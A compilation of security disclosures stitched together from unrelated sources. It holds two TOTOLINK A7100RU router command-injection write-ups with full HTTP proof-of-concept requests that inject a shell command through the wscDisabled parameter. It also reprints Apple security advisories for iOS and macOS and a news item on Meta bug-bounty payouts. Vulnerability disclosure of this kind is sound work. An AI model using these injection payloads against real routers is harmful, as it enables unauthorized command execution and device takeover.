TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiSignalCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46631: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46634: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.

Released December 13, 2022

**AppleAVD**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AVEVideoEncoder**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**File System**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Graphics Driver**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**IOHIDFamily**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**iTunes Store**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed through improved input validation.

CVE-2022-40303: Maddie Stone of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero

**ppp**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Safari**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

CVE-2022-46700: About the security content of iOS 15.7.2 and iPadOS 15.7.2

The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.

Released December 13, 2022

**Accounts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AppleAVD**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**AVEVideoEncoder**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**CoreServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**GPU Drivers**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-46702: Xia0o0o0o of W4terDr0p, Sun Yat-sen University

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42850: Willy R. Vasquez of The University of Texas at Austin

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42851: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**iTunes Store**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2022-42844: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Software Update**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to elevate privileges

Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.

CVE-2022-42849: Mickey Jin (@patch1t)

**Weather**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

CVE-2022-46702: About the security content of iOS 16.2 and iPadOS 16.2

The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.

Released December 13, 2022

**Accounts**

Available for: macOS Ventura

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AMD**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-42847: ABC Research s.r.o.

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**Bluetooth**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Boot Camp**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: An access issue was addressed with improved access restrictions.

CVE-2022-42853: Mickey Jin (@patch1t) of Trend Micro

**CoreServices**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**DriverKit**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-46697: John Aakerblom (@jaakerblom) and Antonio Zekic (@antoniozekic)

**iTunes Store**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: macOS Ventura

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: macOS Ventura

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: macOS Ventura

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: macOS Ventura

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Ruby**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-24836

CVE-2022-29181

**Safari**

Available for: macOS Ventura

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Weather**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

**xar**

Available for: macOS Ventura

Impact: Processing a maliciously crafted package may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved checks.

CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

CVE-2022-46701: About the security content of macOS Ventura 13.1

Facebook's parent company has also expanded bug-bounty payouts to include Oculus and other "metaverse" gadgets for AR/VR.

Facebook parent Meta will pay up to $300,000 to security researchers who report exploitable remote code execution (RCE) vulnerabilities in the Android and iOS versions of Facebook, Messenger, Instagram, and WhatsApp.

The actual amount will vary depending on the amount of user interaction — measured in "clicks" — to trigger the flaw. To qualify for the maximum payout, a security researcher would need to include working proof-of-concept code for exploiting the flaw in any of the current or previous two versions of Android or a currently supported version of Apple's iOS.

**Updated Payout Guidelines**

In addition to the updated guidelines for mobile RCE, Meta this week also released new payout guidelines for account takeover (ATO) and two-factor authentication (2FA) bypass vulnerabilities. 

The maximum payout for a 2FA flaw is $20,000, while that for an ATO vulnerability is $130,000. Here again, the actual payout will depend on the ease with which an attacker can exploit a vulnerability. For instance, a researcher who reports and demonstrates an exploitable zero-click authentication bug can garner the $130,000 payout, while a one-click ATO will fetch a $50,000 reward.

The company also introduced new payout guidelines for bugs reported in its Meta Quest Pro and other virtual reality (VR) technologies, making Meta one of the first companies to set rewards for vulnerabilities in VR and mixed-reality devices.

Meta's updated payout guidelines for mobile RCE bugs and its new rewards for ATO and authentication bypass flaws are the latest tweaks to the company's nearly 11-year bug-bounty program. Under it, Meta has so far paid some $16 million to freelance researchers from around the world who have reported bugs in its online platforms.

The latest changes are part of the company's effort to ensure that the bug bounties Meta offers and the products that are covered under the program remain aligned with evolving threats, says Neta Oren, the security engineer who leads Meta's bug-bounty initiative.

"Every year, we continue to learn new things about how to best engage with the community and adjust our program to address some of the most impactful areas in evolving spaces," Oren says. "Our program has grown from just covering Facebook's Web page in 2011 to now cover all of our Web and mobile clients across our family of apps, including Instagram, WhatsApp, Oculus, Workplace, and more."

**Crowdsourced Cybersecurity**

Meta's bug-bounty program is similar to those of the hundreds of other companies that have implemented crowdsourced vulnerability-hunting programs in recent years. Many security experts consider these programs as a relatively cost-effective way of finding vulnerabilities that internal security teams might have missed. The programs give ethical hackers a structured way to find and report vulnerabilities they might discover on a website or Web application — and receive a reward for their effort.

